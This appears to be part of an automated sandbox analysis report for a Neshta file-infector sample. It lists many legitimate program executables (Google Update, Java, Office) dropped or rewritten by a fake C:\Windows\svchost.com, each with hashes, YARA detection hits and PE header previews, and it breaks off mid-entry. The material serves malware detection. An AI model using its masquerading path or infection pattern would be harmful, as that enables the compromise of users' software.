                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\Source user\OSE.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.254081989191424
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCbblZ1PNq9uCUOFVSiHdq+sxneZ:sr85Cbbr1Pg9uCRFRzsxeZ
                                                                                                                        MD5:C2C98501C8C0A38CB3B3D89B1CD09C67
                                                                                                                        SHA1:8D8469485BD3995DE34512BAC18DA482A31B5DC2
                                                                                                                        SHA-256:EFB24F3670542E6B491E3B9092E31E5068EDC2068C986F4D96E9F8176F6DCF26
                                                                                                                        SHA-512:10A42C069528EE8D55BE2106F2851B9E26AFEA5311D63D1CEDE860DB6B8E0252C3875422B047A9C6D35FC3D3F8409771A682B67C85CACF0A8D8A9352491FC3E0
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.565853286242963
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJPwnvIu/+HCidGL0RYfqJfj+0xUYfQ76:JxqjQ+P04wsmJC6cQZo0xUFGh1SNcs8
                                                                                                                        MD5:2BE98153912196C9044AB31250DEAF28
                                                                                                                        SHA1:18487088B298B9E6B5E7FBDD00D5C37F2ED6AA78
                                                                                                                        SHA-256:47164473C9E34EC71472CB3516C4575D1C8A4484BE1308DD69AAD38CB84D03AD
                                                                                                                        SHA-512:20DB7DFC73249CE140DC3764D8A304A0CE080E9421751CA394829D0A57962D19A86C2A799CD0650DE14CD0CCF56BE887B63E696A9FB0F2D12994DDAB410CB662
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.517183428602308
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJPgOCegc5f3E/lwvSHazYLO0K/rdiiA9:JxqjQ+P04wsmJCznxUOoQXALA
                                                                                                                        MD5:10CA92590C0A328CD9DD6B232AC5B97C
                                                                                                                        SHA1:CA9C9D94ACA6666E7655B9A7E3E11EAA23D84119
                                                                                                                        SHA-256:D6E3584260FE9CC093D4E7A33A66C201059296D5BBE30DFDFDD3AD76584192CD
                                                                                                                        SHA-512:5D78BA107880C8D8FACF61EA5C097705E6410C8D2AF8D6D49540B19FD2DDAB9177080B6435D30B9E3448C81DA4C85943456F93A4F3F549DEFD0794AFE85CAD59
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.31341198420156
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCMw0wAh3A5sWBMcdSJ+L94ltGTxv5ou:sr85CMuAt2Sk2m5ou
                                                                                                                        MD5:C5CBA627E9C4F07BF06013E2E19A2ADF
                                                                                                                        SHA1:B8678C954DE42C8D686384179EB1835E378C19E3
                                                                                                                        SHA-256:0215077B4DAAC5B17314C2A55673E2416ADAD7CD34E8C33AE748AE22C59A2CC5
                                                                                                                        SHA-512:234455B1C396B38DF98C569584C85CE153423CAC75E9E0DBCB724D9A0795FBCBE6D116185017535CC23ABAC49DCE9C77A9D8F470BE7B899E80C7C7E5086EE76F
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.571220400525005
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC85J2AeSh8/J7YGzhc299YX:sr85CRgh2Bh1c27YX
                                                                                                                        MD5:2CE4DFB3663A6C0B5EA20EA10DECE139
                                                                                                                        SHA1:A9D39DDD39D9419D1B0A836E9110BC5E7CE071DA
                                                                                                                        SHA-256:006DC11C857D8EC872D4ECFB6CF70FB1BAB5C95AF8773BBEC11E07C2E0BEFC27
                                                                                                                        SHA-512:0F25FF89C156ED21AFB55F07BE74C8B290C9E42710A3AE3917CE2FEAEE3626FA20E26F1088CF47CC487B18C69E3A1A3B560A321F63EAAB9A3F478822B2B0F904
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.35638621946935
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJ1jaG5lO8Ao+MJo1So6lSvUpRGaCJ9K7:JxqjQ+P04wsmJCwNbRu+2Hdt5yG10x
                                                                                                                        MD5:9AC378232CF66E98AC476EE00ACD8A6B
                                                                                                                        SHA1:ADDECA30D06C773A5C6D209646EC64DC0CDF3039
                                                                                                                        SHA-256:F3C6416304690DD5950F44E4721CE140B8932BE7C130204DEE2A623998F0F716
                                                                                                                        SHA-512:F14621706EF7E9E480A13E17B3A0764B93AE06EC6507C2401FC57D29D565397969A98091E373DF06A169C3005537A8E635610F1091AED5B64B8A22D9D253B46E
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.572547877647106
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCBeljakK11t5rL6Tfr/sVKQ7t:sr85CBkjtQVrY/0
                                                                                                                        MD5:FDB7DA820D2F539A317A598BA31067C8
                                                                                                                        SHA1:C9D147B854A2BB03D782A3BA1C645C525DA0EBD8
                                                                                                                        SHA-256:2D98E44BE09EDB2627AAB1A7AC69FF72CC7C06E24CA77B9F4C14A602B5DD78BB
                                                                                                                        SHA-512:6195C603856129DB9310484D0FD09AF788FDACFC468EC21C3F99E6BE7718AC491D6E001048492C3A67F811EABC062432DCF0EAAE175489B1A63A6CED1E8D8692
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.571346004771877
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCjpJaUWSZknGE7YGzh82dlYX:sr85CSsZmGkh182jYX
                                                                                                                        MD5:5BC82420D22E028C2481B8150AD4F793
                                                                                                                        SHA1:9DE41D3BA5DBF3DC259110C5C34E216315DFD327
                                                                                                                        SHA-256:2CAAF2C35A46F53327B11B7EE33B34E1DB112D5C83798BC1B1FEB11A7DD38DD1
                                                                                                                        SHA-512:61A5207DAFC38941A87EBB47B835F212C4D4581F2E3EBE5FE2AEAA7E1D51221DD1805176B0925967B4934754092B364A1A40DEEB778E6817B6BAEC533B367D1A
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.5964179831347325
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC3GoO5OLmk1uFQfI5367Kd8:sr85Cnm5Wi3h8
                                                                                                                        MD5:49108FC1C6FF24CD49C200E2D7A44B86
                                                                                                                        SHA1:E79038C6363781BF92D4487BD77A4A770352E948
                                                                                                                        SHA-256:06197B71B98A7C4FC08B2B354B6B5DE011BA11CF958827BEE3438B170A27F17F
                                                                                                                        SHA-512:008A7A84B3BC2337AF59260348076CDEE1F3C507AD2BF4D2C567029E1F12594555D2BDC4B9BEB2AE77B29E07F7F02158806DB196BB1878D9018E34E7A7757FA1
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.653521772684421
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC/rmKEs2WzzIR++tGuPkNoAvBFbq6DAcBDjFsb:sr85C/qLWos+tGEkBbq6D3Bdsb
                                                                                                                        MD5:50B7F8BD51D8BEA4542C8B6FB7046568
                                                                                                                        SHA1:46FE9571A136EEDD3DC35089F096D47B32EA74C8
                                                                                                                        SHA-256:86A782FF58F3B5F1736EF23051833E340FD56A77C1EDDDBA8ECC5A507BA47EE0
                                                                                                                        SHA-512:87A46E55F78299DA53343B832D84C81C230D46AEFB71C603998DA5F6D0BB3FFE6FDA5F825F5731F7B810E21C1EF8E9812278D07E7402BB3913AF6DD66DD43CE1
                                                                                                                        Malicious:true
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.330325009255707
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC/rmKMmG2haDkdWIJ7OkUVS:sr85C/qzE+bgOkIS
                                                                                                                        MD5:47848F50CD963815CF2894B7C284095C
                                                                                                                        SHA1:8F8E03058352E172E9158782BC8E315D026CD720
                                                                                                                        SHA-256:115C7F82BED3C1779F50CE53273248152587D8F9421B933C10534B84E16E7815
                                                                                                                        SHA-512:9D692E732A6E0F673A2A4ACC6E7877976FCB2901A874D696ADF2A16EB55C08AB738744811AC9A6AFD5673F2FE272E2C6663B6EB123049F41FA5C1E68EBCD5A8E
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.656070779362061
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC/rmKKKajo+iKndnTdkCE1A6n82c6jbs2:sr85C/qo0o+iwdnP6ngIs2
                                                                                                                        MD5:60628C314BCF2A97CCFA9CB4241A2DAB
                                                                                                                        SHA1:6EF748A1568A9AE0D541C5CDF0F74430A59E4DE5
                                                                                                                        SHA-256:FD8BD222DB055C39D6050A10F91EEE576ADDFC37CE78F585ACC48F96E222FA90
                                                                                                                        SHA-512:2AC9ED50008A13A4255ABB338C675D53688D321E6086B6DF17B02A3F89896051F60E8565001CE0B7BCEBD0CD211DED9B9574347BC95A05922700C20806EC93EC
                                                                                                                        Malicious:true
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaws.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.6397427450636055
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC/rmKHLgwHz2xi03XxQy012eqZwE:sr85C/qMsc2Y03BQz2eqZP
                                                                                                                        MD5:7132D6785E73B1159F3AC9AC5DE71A1C
                                                                                                                        SHA1:0EF8C262E63E3776662064D00E5C4264D0213C8B
                                                                                                                        SHA-256:629945249C52DDB4108FF5C239D4E2C79C92A545ECD25DAE395697831D648A5F
                                                                                                                        SHA-512:804BD2E14C52D226F1D470D0C73B3DE7945EA24EA4554D916FF796E24F6C7C6B5A21284396C6359CBD94ACCE87517D19984F207FEED537AE9DDE8C29D04D2A9E
                                                                                                                        Malicious:true
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.346606571165856
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCOLIFaIz9SEhJyurf6S1TWfavAd3VbB:sr85Cb7hfFTkd33
                                                                                                                        MD5:95ED8DD6C4D471F68911840679CA1F9B
                                                                                                                        SHA1:5BDD0A4778F72B6AC95FEEFF108F74E342981690
                                                                                                                        SHA-256:82B98FAF27483CB4C8957A2BC6306C47D59559046C8DCDC03C708C77C36E2417
                                                                                                                        SHA-512:581BD049EDCEC4E330FEC670AF7B2980F1B338FC8588B596555803A43B0BE4232A3376CB314C8F3C9DC615D892D80746EB2E1C60766BDB7E046515DB9751DD8B
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.107296013528715
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCWnoDdvhQBW1kqanjaYt6Zs8:sr85CaEQQhanIZs8
                                                                                                                        MD5:4141A0DE0BCBE19FA9E93DB323462679
                                                                                                                        SHA1:88F7E506A247D882C4F4E924D1E3DAB0FC077387
                                                                                                                        SHA-256:3CD849C610540723B3785865DFCC8F65B820003251B39ED6594A8A979F20E948
                                                                                                                        SHA-512:940ED87A4C20AE138D388D2324AEBCCA2FC4C93B8D8C2443E91EB382937F79B55BDAD03F595C4EF3FA94D0EC087EA3C228ABB143BBCB79C554E5C3FA38CAA754
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.242980084696127
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCZqO55PvVT4zHu+wLZ8qU:sr85CIO55PvV8HVwLZ8qU
                                                                                                                        MD5:18E80CD6901FFDEDD81B44D0526240D4
                                                                                                                        SHA1:640A66FC69235A0B3677A010376FC607CC2B50E6
                                                                                                                        SHA-256:3A70FBA9C369E6FC2DB35AF45D1201833ADEB33B1ACE24603A582D2BACE6ACDF
                                                                                                                        SHA-512:4F62E2168BFCFD0329F12F93FB5783B9D70989852CF9C12339FDED1ACC5C984FCC847555DD223C6EE2C3CEF64DD95F580DB31138F9D2F47E68FF2F6106A3BED3
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.2705620011183765
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCFtwbWR/v1o/G42UR9whwRrcUTR9EhhBhc:sr85CpnD9UR9whwtvTRMBy
                                                                                                                        MD5:F56F560D473A7660D3AD44E731930A06
                                                                                                                        SHA1:B71090C328FF4234B213D76689591DE15DEBD0F3
                                                                                                                        SHA-256:9B7384DC0D5DBA8C5161DB5C42D3075A4281716F741F10DEF974C5C680308CD0
                                                                                                                        SHA-512:0134B6C093C053343177A83B81A23EEE54BF4C655958906B854B221B85097D633FA96953B83343F6C207BE5A15919017EA26C05DD3B46193618FC26510C6E74F
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):5.110851138659397
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCIbgvgvwvEvFvwYF57LoW8dwhFz7Oos8iwiFT7XMvNvev0vUvZo:sr85CIbMMc4ZTTfRyKFifVlt7wx+oIVg
                                                                                                                        MD5:4DA76295D7246E94AC917F192A2ACE84
                                                                                                                        SHA1:58964579A019BEAB01488F1B1FD0A83C4A38B0CB
                                                                                                                        SHA-256:D1D94327BEFFD6F453E862BFE9B715C980B20F33F38C8825AA2B2DF1DF33F9A5
                                                                                                                        SHA-512:8811B0CC2BDE08B9354AC1F84F441F7E3D11A31D7E5D25139E53DA4C2C2E99645A1F37FAA7FD043B4FCC1169DB59FF4F7BA8EAC9CAC14CD455B3CCD34B6BAAD2
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.46960810763993
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCwMkBExFhpgLTGlrFBbeEOCr:sr85CJ7uTGlr3iE5r
                                                                                                                        MD5:3AE73C8D42CF093E893717A04A20D5F8
                                                                                                                        SHA1:96384CCD613D795E953BFD876250C86007EF74D6
